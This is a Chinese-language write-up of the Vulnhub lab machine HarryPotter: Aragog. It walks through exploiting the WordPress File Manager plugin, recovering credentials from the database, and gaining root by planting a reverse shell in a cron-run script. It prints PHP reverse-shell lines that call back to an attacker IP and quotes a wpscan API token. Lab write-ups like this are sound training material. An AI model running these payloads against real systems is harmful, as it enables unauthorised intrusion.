Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

这篇具有很好参考价值的文章主要介绍了Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

方式一

信息收集

主机发现
 sudo arp-scan -l

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

端口扫描

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

目录扫描

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

index.html

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

blog

网页没有样式

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

查看网页源码

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具
msf6 > search wordpress file manager

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

use 1
info

查看需要配置的信息

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

hagrid98家目录下得到一串base64格式加密的数据

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

使用BurpSuiteDecoder功能解码

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

使用得到用户名root,密码mySecr3tPass,来连接数据库

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

在线解密网站

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

root提权

使用sudo suid查询后发现没有可利用的

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

然后查找备份文件,查看有没有.sh结尾的文件

find / -name '*.sh'

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell


kali监听6868端口

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

方式二

信息收集

gobuster扫描
└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wpscan扫描
wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

生成反弹 shell写入到payload.php文件里

php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

运行脚本,得到反弹shell地址

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

地址中多写了一个/blog,删除即可

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机

等一会就反弹到了

Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1,# Vulnhub靶机系列,安全,kali,web安全,网络安全,靶机文章来源地址https://www.toymoban.com/news/detail-708789.html

到了这里,关于Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub系列靶机 Hackadmeic.RTB1

    系列:Hackademic(此系列共2台) 难度:初级 信息收集 主机发现 端口扫描 访问80端口 使用指纹识别插件查看是 WordPress 根据首页显示的内容,点击 target 点击 页面能点击的链接,发现点击 Uncategorized 的时候,链接变成了 尝试有无SQL注入,在 ?cat=1 后加上 \\\' ,发现有SQL语句的报

    2024年02月12日
    浏览(24)
  • Vulnhub项目:Aragog

    HarryPotter: Aragog (1.0.2) ~ VulnHub 死亡圣器三部曲之第一部,Aragog是海格养的蜘蛛的名字, 并且又牵扯到了密室 确定靶机ip,攻击机ip,扫描靶机开放端口  只有22,80端口,对80端口进行目录爆破,发现是wordpress框架  这里给了提示,说明是wordpress plugins存在一些可利用的点    查

    2024年02月10日
    浏览(22)
  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(32)
  • Vulnhub靶机:driftingblues 4

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues4(10.0.2.20) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 使用nmap主机发现靶机ip: 10.0.2.20 使用nmap端口扫描发现靶机开放端口: 21、22、80 打开网站没有可利用的功能点,并且

    2024年02月01日
    浏览(39)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(44)
  • Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(28)
  • Vulnhub: bassamCTF: 1靶机

    kali:192.168.111.111 靶机:192.168.111.210 端口扫描 修改hosts文件 爆破出子域名 welcome 对子域目录爆破 index.php 存在文件读取 查看 /etc/passwd 和 config.php 用 config.php 中的账号密码登录ssh,账号: test ,密码: test123 查看test用户的历史命令发现文件 MySecretPassword MySecretPassword 文件内容

    2024年02月11日
    浏览(30)
  • Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(26)
  • Vulnhub: Corrosion靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 目录爆破 blog-post目录下存在两个目录 对archives目录中的randylogs.php进行测试发现存在文件包含 成功包含ssh日志 利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell 文件包含ssh日志文件执行反弹shell 在/var/backups目录下发现us

    2024年02月09日
    浏览(30)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(26)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包